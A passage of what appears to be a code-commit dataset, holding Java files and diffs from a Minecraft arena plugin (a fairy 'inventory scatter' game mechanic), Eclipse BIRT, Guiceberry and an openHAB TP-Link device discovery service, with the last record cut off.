log.warning("The player: " + player.getName() + " may have an unfair advantage."); } } } @Override public ArenaType getArenaType() { return ArenaType.MONITORED; } public void restoreBlocks() { int min = 1000 * 60 * 170; BaseBlock b; Map.Entry<Location, AbstractMap.SimpleEntry<Long, BaseBlock>> e; 
Iterator<Map.Entry<Location,AbstractMap.SimpleEntry<Long,BaseBlock>>> it = map.entrySet().iterator(); while(it.hasNext()) { e = it.next(); if ((System.currentTimeMillis() - e.getValue().getKey()) > min) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } else if (System.currentTimeMillis() - e.getValue().getKey() > (min / 20) && EnvironmentUtil.isShrubBlock(e.getValue().getValue().getType())) { b = e.getValue().getValue(); if (!e.getKey().getChunk().isLoaded()) e.getKey().getChunk().load(); e.getKey().getBlock().setTypeIdAndData(b.getType(), (byte) b.getData(), true); it.remove(); } } } private List<ItemStack> getRandomDropSet(CommandSender player) { // Create the Sacrifice int amt, value; if (ChanceUtil.getChance(59)) { amt = 64; value = 5248; } else { amt = 8; value = 88; } // Sacrifice and make loot list List<ItemStack> loot; do { loot = SacrificeComponent.getCalculatedLoot(player, amt, value); } while (loot == null || loot.size() < 1); // Shuffle and return loot for variety Collections.shuffle(loot); return loot; } private void eatFood(Player player) { if (player.getSaturation() - 1 >= 0) { player.setSaturation(player.getSaturation() - 1); } else if (player.getFoodLevel() - 1 >= 0) { player.setFoodLevel(player.getFoodLevel() - 1); } } private void trick(final Player player) { if (ChanceUtil.getChance(256)) { final PlayerInventory pInv = player.getInventory(); switch (ChanceUtil.getRandom(2)) { case 1: boolean hasAxe = true; switch (pInv.getItemInHand().getTypeId()) { case ItemID.DIAMOND_AXE: pInv.addItem(new ItemStack(ItemID.DIAMOND, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.GOLD_AXE: pInv.addItem(new ItemStack(ItemID.GOLD_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.IRON_AXE: pInv.addItem(new ItemStack(ItemID.IRON_BAR, 2), new ItemStack(ItemID.STICK, 2)); break; case ItemID.WOOD_AXE: pInv.addItem(new ItemStack(BlockID.WOOD, 2), new ItemStack(ItemID.STICK, 2)); break; default: hasAxe = false; ChatUtil.sendWarning(player, "The fairy couldn't find an axe and instead throws a rock" + "at you."); player.damage(7); player.setVelocity(new Vector( random.nextDouble() * 2.0 - 1.5, random.nextDouble() * 1, random.nextDouble() * 2.0 - 1.5) ); } if (hasAxe) { ChatUtil.sendWarning(player, "The fairy breaks your axe."); server.getScheduler().runTaskLater(inst, new Runnable() { @Override public void run() { player.getInventory().setItemInHand(null); } }, 1); } break; case 2: // Make potion ItemStack potion = new Potion(PotionType.INSTANT_DAMAGE).toItemStack(1); PotionMeta pMeta = (PotionMeta) potion.getItemMeta(); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.INCREASE_DAMAGE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.REGENERATION, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.DAMAGE_RESISTANCE, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.WATER_BREATHING, 20 * 600, 2), false); pMeta.addCustomEffect( new PotionEffect(PotionEffectType.FIRE_RESISTANCE, 20 * 600, 2), false); pMeta.setDisplayName(ChatColor.WHITE + "Extreme Combat Potion"); potion.setItemMeta(pMeta); // Give potion ChatUtil.sendWarning(player, "You might need this friend ;)"); getWorld().dropItemNaturally(player.getLocation(), potion); int waves = 5 * ChanceUtil.getRandom(3); for (int i = 0; i < waves; i++) { 
server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Slimes away guys!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < 25 * ChanceUtil.getRandom(4); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (b.getTypeId() == BlockID.AIR || EnvironmentUtil.isShrubBlock(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(ChanceUtil.getRandom(8)); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (i + 1)); } server.getScheduler().scheduleSyncDelayedTask(inst, new Runnable() { @Override public void run() { ChatUtil.sendNotice(getContainedPlayers(), "Release the god slime!"); BlockVector min = getRegion().getMinimumPoint(); BlockVector max = getRegion().getMaximumPoint(); short sOut = 1000; com.sk89q.worldedit.Vector v; for (int i = 0; i < ChanceUtil.getRandom(1); i++) { sOut--; if (sOut < 0) break; v = LocationUtil.pickLocation(min.getX(), max.getX(), min.getZ(), max.getZ()); v = v.add(0, 83, 0); if (getRegion().contains(v.getBlockX(), v.getBlockY(), v.getBlockZ())) { Block b = getWorld().getBlockAt(v.getBlockX(), v.getBlockY(), v.getBlockZ()); if (BlockType.canPassThrough(b.getTypeId())) { Slime s = (Slime) getWorld().spawnEntity(b.getLocation(), EntityType.SLIME); s.setSize(16); s.setRemoveWhenFarAway(false); continue; } } i--; } } }, 20 * 7 * (waves + 1)); break; } } } @EventHandler(priority = EventPriority.HIGHEST, ignoreCancelled = true) public void onBlockBreak(BlockBreakEvent event) { final Player player = event.getPlayer(); final Block block = event.getBlock(); ItemStack itemInHand = player.getItemInHand(); if (!adminComponent.isAdmin(player) && contains(block) && (block.getTypeId() == BlockID.LOG || EnvironmentUtil.isShrubBlock(block)) && itemInHand != null) { if (block.getTypeId() == BlockID.LOG) { short c = 0; for (ItemStack aItemStack : getRandomDropSet(player)) { if (c >= 3) break; getWorld().dropItemNaturally(block.getLocation(), aItemStack); c++; } event.setExpToDrop(ChanceUtil.getRandom(4)); eatFood(player); trick(player); } map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } else if (contains(block)) { event.setCancelled(true); ChatUtil.sendWarning(player, "You cannot break this block for some reason."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onLeafDecay(LeavesDecayEvent event) { if (contains(event.getBlock())) { Block block = event.getBlock(); map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); if (!ChanceUtil.getChance(14)) return; getWorld().dropItemNaturally(block.getLocation(), getRandomDropSet(server.getConsoleSender()).get(0)); } } @EventHandler(ignoreCancelled = true) public void onItemSpawn(ItemSpawnEvent event) { if (contains(event.getEntity())) { for (Location l : map.keySet()) { if (l.getBlock().equals(event.getEntity().getLocation().getBlock())) { int is = event.getEntity().getItemStack().getTypeId(); if (is == BlockID.LOG || is == 
BlockID.SAPLING) { event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onPlayerDropItem(PlayerDropItemEvent event) { if (contains(event.getItemDrop())) { for (Location l : map.keySet()) { if (event.getItemDrop().getLocation().getBlock().equals(l.getBlock())) { int is = event.getItemDrop().getItemStack().getTypeId(); if (is == BlockID.LOG || is == BlockID.SAPLING) { ChatUtil.sendError(event.getPlayer(), "You can't drop that here."); event.setCancelled(true); } return; } } } } @EventHandler(ignoreCancelled = true) public void onBlockPlace(BlockPlaceEvent event) { Player player = event.getPlayer(); if (!adminComponent.isAdmin(player) && contains(event.getBlock()) && !inst.hasPermission(player, "aurora.mine.builder")) { event.setCancelled(true); ChatUtil.sendNotice(player, ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(priority = EventPriority.MONITOR, ignoreCancelled = true) public void onBucketFill(PlayerBucketFillEvent event) { if (contains(event.getBlockClicked())) { final Block block = event.getBlockClicked(); map.put(block.getLocation(), new AbstractMap.SimpleEntry<>(System.currentTimeMillis(), new BaseBlock(block.getTypeId(), block.getData()))); } } @EventHandler(ignoreCancelled = true) public void onBucketEmpty(PlayerBucketEmptyEvent event) { if (contains(event.getBlockClicked())) { event.setCancelled(true); ChatUtil.sendNotice(event.getPlayer(), ChatColor.DARK_RED, "You don't have permission for this area."); } } @EventHandler(ignoreCancelled = true) public void onEggHatch(EggHatchEvent event) { if (contains(event.getEgg())) event.setCancelled(true); } }
Added an inventory scatter attack for fairies in the Enchanted Forest
src/main/java/com/skelril/aurora/city/engine/arena/EnchantedForest.java
Added an inventory scatter attack for fairies in the Enchanted Forest
<ide><path>rc/main/java/com/skelril/aurora/city/engine/arena/EnchantedForest.java <ide> package com.skelril.aurora.city.engine.arena; <ide> <add>import com.google.common.collect.Lists; <ide> import com.sk89q.commandbook.CommandBook; <ide> import com.sk89q.worldedit.BlockVector; <ide> import com.sk89q.worldedit.blocks.BaseBlock; <ide> import org.bukkit.block.Block; <ide> import org.bukkit.command.CommandSender; <ide> import org.bukkit.entity.EntityType; <add>import org.bukkit.entity.Item; <ide> import org.bukkit.entity.Player; <ide> import org.bukkit.entity.Slime; <ide> import org.bukkit.event.EventHandler; <ide> <ide> if (ChanceUtil.getChance(256)) { <ide> final PlayerInventory pInv = player.getInventory(); <del> switch (ChanceUtil.getRandom(2)) { <add> switch (ChanceUtil.getRandom(3)) { <ide> case 1: <ide> boolean hasAxe = true; <ide> switch (pInv.getItemInHand().getTypeId()) { <ide> } <ide> }, 20 * 7 * (waves + 1)); <ide> break; <del> <add> case 3: <add> List<ItemStack> toDrop = Lists.newArrayList(pInv.getArmorContents()); <add> toDrop.addAll(Arrays.asList(pInv.getContents())); <add> for (ItemStack aDrop : toDrop) { <add> if (aDrop == null || aDrop.getTypeId() == BlockID.AIR) continue; <add> Item item = getWorld().dropItem(player.getLocation(), aDrop); <add> item.setVelocity(new Vector( <add> random.nextDouble() * 2 - 1, <add> random.nextDouble() * 1, <add> random.nextDouble() * 2 - 1 <add> )); <add> } <add> pInv.setArmorContents(null); <add> pInv.clear(); <add> ChatUtil.sendNotice(player, "The fair throws your stuff all over the place"); <ide> } <ide> } <ide> }
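The commit above introduces the inventory-scatter behavior as a third case inside an already long switch statement. As a readability aid only, the following sketch isolates that step into a standalone helper; the class and method names are hypothetical, and it assumes the same Bukkit and Guava dependencies the plugin already uses (World#dropItem, Item#setVelocity, PlayerInventory#getArmorContents), mirroring the calls that appear in the diff rather than inventing new API.

// Sketch only: the scatter step from "case 3" of the diff, pulled into a helper.
import java.util.Arrays;
import java.util.List;
import java.util.Random;

import org.bukkit.entity.Item;
import org.bukkit.entity.Player;
import org.bukkit.inventory.ItemStack;
import org.bukkit.inventory.PlayerInventory;
import org.bukkit.util.Vector;

import com.google.common.collect.Lists;

public final class InventoryScatter {

	private static final Random RANDOM = new Random();

	private InventoryScatter() {
	}

	// Drops armor and carried items around the player with a small random velocity,
	// then empties the inventory, as the committed case 3 does inline.
	public static void scatter(final Player player) {
		final PlayerInventory pInv = player.getInventory();
		final List<ItemStack> toDrop = Lists.newArrayList(pInv.getArmorContents());
		toDrop.addAll(Arrays.asList(pInv.getContents()));
		for (final ItemStack aDrop : toDrop) {
			if (aDrop == null) {
				continue; // empty slot
			}
			final Item item = player.getWorld().dropItem(player.getLocation(), aDrop);
			// x/z in [-1, 1), y in [0, 1): a gentle outward toss
			item.setVelocity(new Vector(
					RANDOM.nextDouble() * 2 - 1,
					RANDOM.nextDouble(),
					RANDOM.nextDouble() * 2 - 1));
		}
		pInv.setArmorContents(null);
		pInv.clear();
	}
}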
Java
epl-1.0
2113e8d17077e565eb1337d32814da417a8d915c
0
sguan-actuate/birt,rrimmana/birt-1,rrimmana/birt-1,rrimmana/birt-1,rrimmana/birt-1,Charling-Huang/birt,sguan-actuate/birt,sguan-actuate/birt,sguan-actuate/birt,Charling-Huang/birt,Charling-Huang/birt,Charling-Huang/birt,Charling-Huang/birt,sguan-actuate/birt,rrimmana/birt-1
/* ************************************************************************* * Copyright (c) 2006 Actuate Corporation. * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html * * Contributors: * Actuate Corporation - initial API and implementation * ************************************************************************* */ package org.eclipse.birt.report.data.adapter.internal.adapter; import java.util.Iterator; import java.util.Map; import org.eclipse.birt.core.data.Constants; import org.eclipse.birt.core.exception.BirtException; import org.eclipse.birt.core.script.JavascriptEvalUtil; import org.eclipse.birt.data.engine.api.querydefn.OdaDataSourceDesign; import org.eclipse.birt.report.data.adapter.api.AdapterException; import org.eclipse.birt.report.data.adapter.i18n.ResourceConstants; import org.eclipse.birt.report.model.api.ExtendedPropertyHandle; import org.eclipse.birt.report.model.api.OdaDataSourceHandle; import org.mozilla.javascript.Scriptable; /** * Adapts a Model ODA data source handle to equivalent DtE * oda data source definition */ public class OdaDataSourceAdapter extends OdaDataSourceDesign { private Scriptable bindingScope; /** * Creates adaptor based on Model OdaDataSourceHandle. * @param source model handle * @param propBindingScope Javascript scope in which to evaluate property bindings. If null, * property bindings are not evaluated. */ public OdaDataSourceAdapter( OdaDataSourceHandle source, Scriptable propBindingScope) throws BirtException { super(source.getQualifiedName()); bindingScope = propBindingScope; // Adapt base class properties DataAdapterUtil.adaptBaseDataSource( source, this ); // Adapt extended data source elements // validate that a required attribute is specified String driverName = source.getExtensionID( ); if ( driverName == null || driverName.length( ) == 0 ) { throw new AdapterException( ResourceConstants.DATASOURCE_EXID_ERROR, source.getName( ) ); } setExtensionID( driverName ); // static ROM properties defined by the ODA driver extension Map staticProps = DataAdapterUtil.getExtensionProperties( source, source.getExtensionPropertyDefinitionList( ) ); if ( staticProps != null && !staticProps.isEmpty( ) ) { Iterator propNamesItr = staticProps.keySet( ).iterator( ); while ( propNamesItr.hasNext( ) ) { String propName = ( String ) propNamesItr.next( ); assert ( propName != null ); String propValue; // If property binding expression exists, use its evaluation // result String bindingExpr = source.getPropertyBinding( propName ); if ( bindingScope != null && bindingExpr != null && bindingExpr.length( ) > 0 ) { propValue = JavascriptEvalUtil.evaluateScript( null, bindingScope, bindingExpr, "property binding", 0 ).toString(); } else { propValue = ( String ) staticProps.get( propName ); } addPublicProperty( propName, propValue ); } } // private driver properties / private runtime data Iterator elmtIter = source.privateDriverPropertiesIterator( ); if ( elmtIter != null ) { while ( elmtIter.hasNext( ) ) { ExtendedPropertyHandle modelProp = ( ExtendedPropertyHandle ) elmtIter .next( ); addPrivateProperty( modelProp.getName( ), modelProp .getValue( ) ); } } // TODO: move ModeDteApiAdpter there in future addPropertyConfigurationId( this ); } /** * Adds the externalized property configuration id for use by * a BIRT consumer application's propertyProvider extension. 
*/ private void addPropertyConfigurationId( OdaDataSourceDesign dteSource ) throws BirtException { String configIdValue = dteSource.getExtensionID( ) + Constants.ODA_PROP_CONFIG_KEY_SEPARATOR + dteSource.getName( ); dteSource.addPublicProperty( Constants.ODA_PROP_CONFIGURATION_ID, configIdValue ); } }
data/org.eclipse.birt.report.data.adapter/src/org/eclipse/birt/report/data/adapter/internal/adapter/OdaDataSourceAdapter.java
/* ************************************************************************* * Copyright (c) 2006 Actuate Corporation. * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html * * Contributors: * Actuate Corporation - initial API and implementation * ************************************************************************* */ package org.eclipse.birt.report.data.adapter.internal.adapter; import java.util.Iterator; import java.util.Map; import org.eclipse.birt.core.exception.BirtException; import org.eclipse.birt.core.script.JavascriptEvalUtil; import org.eclipse.birt.data.engine.api.querydefn.OdaDataSourceDesign; import org.eclipse.birt.report.data.adapter.api.AdapterException; import org.eclipse.birt.report.data.adapter.i18n.ResourceConstants; import org.eclipse.birt.report.model.api.ExtendedPropertyHandle; import org.eclipse.birt.report.model.api.OdaDataSourceHandle; import org.mozilla.javascript.Scriptable; /** * Adapts a Model ODA data source handle to equivalent DtE * oda data source definition */ public class OdaDataSourceAdapter extends OdaDataSourceDesign { private Scriptable bindingScope; /** * Creates adaptor based on Model OdaDataSourceHandle. * @param source model handle * @param propBindingScope Javascript scope in which to evaluate property bindings. If null, * property bindings are not evaluated. */ public OdaDataSourceAdapter( OdaDataSourceHandle source, Scriptable propBindingScope) throws BirtException { super(source.getQualifiedName()); bindingScope = propBindingScope; // Adapt base class properties DataAdapterUtil.adaptBaseDataSource( source, this ); // Adapt extended data source elements // validate that a required attribute is specified String driverName = source.getExtensionID( ); if ( driverName == null || driverName.length( ) == 0 ) { throw new AdapterException( ResourceConstants.DATASOURCE_EXID_ERROR, source.getName( ) ); } setExtensionID( driverName ); // static ROM properties defined by the ODA driver extension Map staticProps = DataAdapterUtil.getExtensionProperties( source, source.getExtensionPropertyDefinitionList( ) ); if ( staticProps != null && !staticProps.isEmpty( ) ) { Iterator propNamesItr = staticProps.keySet( ).iterator( ); while ( propNamesItr.hasNext( ) ) { String propName = ( String ) propNamesItr.next( ); assert ( propName != null ); String propValue; // If property binding expression exists, use its evaluation // result String bindingExpr = source.getPropertyBinding( propName ); if ( bindingScope != null && bindingExpr != null && bindingExpr.length( ) > 0 ) { propValue = JavascriptEvalUtil.evaluateScript( null, bindingScope, bindingExpr, "property binding", 0 ).toString(); } else { propValue = ( String ) staticProps.get( propName ); } addPublicProperty( propName, propValue ); } } // private driver properties / private runtime data Iterator elmtIter = source.privateDriverPropertiesIterator( ); if ( elmtIter != null ) { while ( elmtIter.hasNext( ) ) { ExtendedPropertyHandle modelProp = ( ExtendedPropertyHandle ) elmtIter .next( ); addPrivateProperty( modelProp.getName( ), modelProp .getValue( ) ); } } } }
CheckIn:Fix SCR85066 clearCache in ReportEngineService not working properly
data/org.eclipse.birt.report.data.adapter/src/org/eclipse/birt/report/data/adapter/internal/adapter/OdaDataSourceAdapter.java
CheckIn:Fix SCR85066 clearCache in ReportEngineService not working properly
<ide><path>ata/org.eclipse.birt.report.data.adapter/src/org/eclipse/birt/report/data/adapter/internal/adapter/OdaDataSourceAdapter.java <ide> import java.util.Iterator; <ide> import java.util.Map; <ide> <add>import org.eclipse.birt.core.data.Constants; <ide> import org.eclipse.birt.core.exception.BirtException; <ide> import org.eclipse.birt.core.script.JavascriptEvalUtil; <ide> import org.eclipse.birt.data.engine.api.querydefn.OdaDataSourceDesign; <ide> .getValue( ) ); <ide> } <ide> } <add> <add> // TODO: move ModeDteApiAdpter there in future <add> addPropertyConfigurationId( this ); <ide> } <add> <add> /** <add> * Adds the externalized property configuration id for use by <add> * a BIRT consumer application's propertyProvider extension. <add> */ <add> private void addPropertyConfigurationId( OdaDataSourceDesign dteSource ) <add> throws BirtException <add> { <add> String configIdValue = dteSource.getExtensionID( ) <add> + Constants.ODA_PROP_CONFIG_KEY_SEPARATOR + dteSource.getName( ); <add> dteSource.addPublicProperty( Constants.ODA_PROP_CONFIGURATION_ID, <add> configIdValue ); <add> } <add> <ide> }
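The new addPropertyConfigurationId method concatenates the ODA extension id, a separator constant, and the data source name, and publishes the result as a public property under Constants.ODA_PROP_CONFIGURATION_ID for a consumer application's propertyProvider extension. The snippet below only illustrates the shape of that value with placeholder inputs; the separator literal and the extension id used here are stand-ins, not the actual constant values from org.eclipse.birt.core.data.Constants.

// Illustrative sketch with hypothetical values; not taken from the BIRT sources.
public class ConfigurationIdExample {

	public static void main(String[] args) {
		String extensionId = "org.eclipse.birt.report.data.oda.jdbc"; // example ODA extension id
		String dataSourceName = "MyDataSource";                       // example data source name
		String separator = ":";                                       // stand-in for ODA_PROP_CONFIG_KEY_SEPARATOR

		// Same composition as in the diff: extensionID + separator + data source name
		String configIdValue = extensionId + separator + dataSourceName;
		System.out.println("OdaPropertyConfigId = " + configIdValue);
	}
}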
Java
apache-2.0
36f68722d54c30bc3f6ffea52fd3e77deb599bec
0
yongchristophertang/guiceberry,stackoverflowmailer/guiceberry,kfowler/guiceberry,paarsar/guiceberry,zorzella/guiceberry
/* * Copyright (C) 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.inject.testing.guiceberry; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; import com.google.inject.Scope; import com.google.inject.ScopeAnnotation; /** * This defines a {@link Scope} that lasts for a single test. * * <p>A test conceptually comes in scope when it starts and goes out of scope * when it finishes its execution (e.g., on JUnit lingo, roughly at the moment * of {@link junit.framework.TestCase#setUp()} and * {@link junit.framework.TestCase#tearDown()}). * * @see com.google.inject.testing.guiceberry.junit3.JunitTestScope for the JUnit-specific implementation of this scope * * @author Luiz-Otavio Zorzella * @author Danka Karwanska */ @Target({ElementType.TYPE, ElementType.METHOD}) @Retention(RetentionPolicy.RUNTIME) @ScopeAnnotation public @interface TestScoped {}
src/com/google/inject/testing/guiceberry/TestScoped.java
/* * Copyright (C) 2008 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.google.inject.testing.guiceberry; import java.lang.annotation.ElementType; import java.lang.annotation.Retention; import java.lang.annotation.RetentionPolicy; import java.lang.annotation.Target; import com.google.inject.Scope; import com.google.inject.ScopeAnnotation; /** * This defines a {@link Scope} that lasts for a single test. * * <p>A test conceptually comes in scope when it starts and goes out of scope * when it finishes its execution (e.g., on JUnit lingo, roughly at the moment * of {@link junit.framework.TestCase#setUp()} and * {@link junit.framework.TestCase#tearDown()}). * * @see com.google.inject.testing.guiceberry.junit3.JunitTestScope for the JUnit-specific implementation of this scope * * @author Luiz-Otavio Zorzella * @author Danka Karwanska */ @Target(ElementType.TYPE) @Retention(RetentionPolicy.RUNTIME) @ScopeAnnotation public @interface TestScoped {}
Support methods in TestScoped annotation to accomodate those that are using provider methods
src/com/google/inject/testing/guiceberry/TestScoped.java
Support methods in TestScoped annotation to accommodate those that are using provider methods
<ide><path>rc/com/google/inject/testing/guiceberry/TestScoped.java <ide> * @author Luiz-Otavio Zorzella <ide> * @author Danka Karwanska <ide> */ <del>@Target(ElementType.TYPE) <add>@Target({ElementType.TYPE, ElementType.METHOD}) <ide> @Retention(RetentionPolicy.RUNTIME) <ide> @ScopeAnnotation <ide> public @interface TestScoped {}
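The widened @Target above lets a Guice provider method be test-scoped, not just a class. The module below is a minimal, hypothetical sketch of what that enables: the module name and the Snapshot type are invented for illustration, and it assumes the TestScoped scope itself is bound elsewhere (e.g. by the JUnit support referenced in the Javadoc's @see tag).

import com.google.inject.AbstractModule;
import com.google.inject.Provides;
import com.google.inject.testing.guiceberry.TestScoped;

// Hypothetical module: with ElementType.METHOD added to @Target, a @Provides
// method can carry @TestScoped directly, so the bound instance is created
// once per test rather than once per injection.
public class ExampleTestModule extends AbstractModule {

    /** Invented type, present only to keep the sketch self-contained. */
    public static class Snapshot {}

    @Override
    protected void configure() {
        // Other test bindings would go here.
    }

    @Provides
    @TestScoped
    Snapshot provideSnapshot() {
        return new Snapshot(); // one instance per test, once the scope is bound
    }
}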
Java
epl-1.0
0b8538a5b92547ea1f3a4d7cdb543c0fbefcf133
0
theoweiss/openhab2,gerrieg/openhab2,gerrieg/openhab2,clinique/openhab2,theoweiss/openhab2,Snickermicker/openhab2,Snickermicker/openhab2,clinique/openhab2,afuechsel/openhab2,digitaldan/openhab2,theoweiss/openhab2,gerrieg/openhab2,Snickermicker/openhab2,clinique/openhab2,afuechsel/openhab2,Snickermicker/openhab2,digitaldan/openhab2,afuechsel/openhab2,digitaldan/openhab2,theoweiss/openhab2,digitaldan/openhab2,gerrieg/openhab2,clinique/openhab2
/** * Copyright (c) 2010-2018 by the respective copyright holders. * * All rights reserved. This program and the accompanying materials * are made available under the terms of the Eclipse Public License v1.0 * which accompanies this distribution, and is available at * http://www.eclipse.org/legal/epl-v10.html */ package org.openhab.binding.tplinksmarthome.internal; import static org.openhab.binding.tplinksmarthome.internal.TPLinkSmartHomeThingType.SUPPORTED_THING_TYPES; import java.io.IOException; import java.net.DatagramPacket; import java.net.DatagramSocket; import java.net.InetAddress; import java.net.SocketTimeoutException; import java.net.UnknownHostException; import java.util.Locale; import java.util.Map; import java.util.Optional; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.ScheduledFuture; import java.util.concurrent.TimeUnit; import org.eclipse.jdt.annotation.NonNullByDefault; import org.eclipse.jdt.annotation.Nullable; import org.eclipse.smarthome.config.discovery.AbstractDiscoveryService; import org.eclipse.smarthome.config.discovery.DiscoveryResult; import org.eclipse.smarthome.config.discovery.DiscoveryResultBuilder; import org.eclipse.smarthome.config.discovery.DiscoveryService; import org.eclipse.smarthome.core.thing.ThingTypeUID; import org.eclipse.smarthome.core.thing.ThingUID; import org.openhab.binding.tplinksmarthome.internal.model.Sysinfo; import org.osgi.service.component.annotations.Component; import org.slf4j.Logger; import org.slf4j.LoggerFactory; /** * The {@link TPLinkSmartHomeDiscoveryService} detects new Smart Home Bulbs, Plugs and Switches by sending a UDP network * broadcast and parsing the answer into a thing. * * @author Christian Fischer - Initial contribution * @author Hilbrand Bouwkamp - Complete make-over, reorganized code and code cleanup. 
*/ @Component(service = { DiscoveryService.class, TPLinkIpAddressService.class }, immediate = true, configurationPid = "discovery.tplinksmarthome") @NonNullByDefault public class TPLinkSmartHomeDiscoveryService extends AbstractDiscoveryService implements TPLinkIpAddressService { private static final String BROADCAST_IP = "255.255.255.255"; private static final int DISCOVERY_TIMEOUT_SECONDS = 8; private static final int UDP_PACKET_TIMEOUT_MS = (int) TimeUnit.SECONDS.toMillis(DISCOVERY_TIMEOUT_SECONDS - 1); private static final long REFRESH_INTERVAL_MINUTES = 1; private final Logger logger = LoggerFactory.getLogger(TPLinkSmartHomeDiscoveryService.class); private final Commands commands = new Commands(); private final Map<String, String> idInetAddressCache = new ConcurrentHashMap<>(); private final DatagramPacket discoverPacket; private final byte[] buffer = new byte[2048]; private @NonNullByDefault({}) DatagramSocket discoverSocket; private @NonNullByDefault({}) ScheduledFuture<?> discoveryJob; public TPLinkSmartHomeDiscoveryService() throws UnknownHostException { super(SUPPORTED_THING_TYPES, DISCOVERY_TIMEOUT_SECONDS); InetAddress broadcast = InetAddress.getByName(BROADCAST_IP); byte[] discoverbuffer = CryptUtil.encrypt(Commands.getSysinfo()); discoverPacket = new DatagramPacket(discoverbuffer, discoverbuffer.length, broadcast, Connection.TP_LINK_SMART_HOME_PORT); } @Override public @Nullable String getLastKnownIpAddress(String deviceId) { return idInetAddressCache.get(deviceId); } @Override protected void startBackgroundDiscovery() { discoveryJob = scheduler.scheduleWithFixedDelay(this::startScan, 0, REFRESH_INTERVAL_MINUTES, TimeUnit.MINUTES); } @Override protected void stopBackgroundDiscovery() { stopScan(); if (discoveryJob != null && !discoveryJob.isCancelled()) { discoveryJob.cancel(true); discoveryJob = null; } } @Override protected void startScan() { logger.debug("Start scan for TP-Link Smart devices."); synchronized (this) { try { idInetAddressCache.clear(); discoverSocket = sendDiscoveryPacket(); // Runs until the socket call gets a time out and throws an exception. When a time out is triggered it // means no data was present and nothing new to discover. while (true) { if (discoverSocket == null) { break; } DatagramPacket packet = new DatagramPacket(buffer, buffer.length); discoverSocket.receive(packet); logger.debug("TP-Link Smart device discovery returned package with length {}", packet.getLength()); if (packet.getLength() > 0) { detectThing(packet); } } } catch (SocketTimeoutException e) { logger.debug("Discovering poller timeout..."); } catch (IOException e) { logger.debug("Error during discovery: {}", e.getMessage()); } finally { closeDiscoverSocket(); removeOlderResults(getTimestampOfLastScan()); } } } @Override protected void stopScan() { logger.debug("Stop scan for TP-Link Smart devices."); closeDiscoverSocket(); super.stopScan(); } /** * Opens a {@link DatagramSocket} and sends a packet for discovery of TP-Link Smart Home devices. * * @return Returns the new socket * @throws IOException exception in case sending the packet failed */ protected DatagramSocket sendDiscoveryPacket() throws IOException { DatagramSocket ds = new DatagramSocket(null); ds.setBroadcast(true); ds.setSoTimeout(UDP_PACKET_TIMEOUT_MS); ds.send(discoverPacket); logger.trace("Discovery package sent."); return ds; } /** * Closes the discovery socket and cleans the value. No need for synchronization as this method is called from a * synchronized context. 
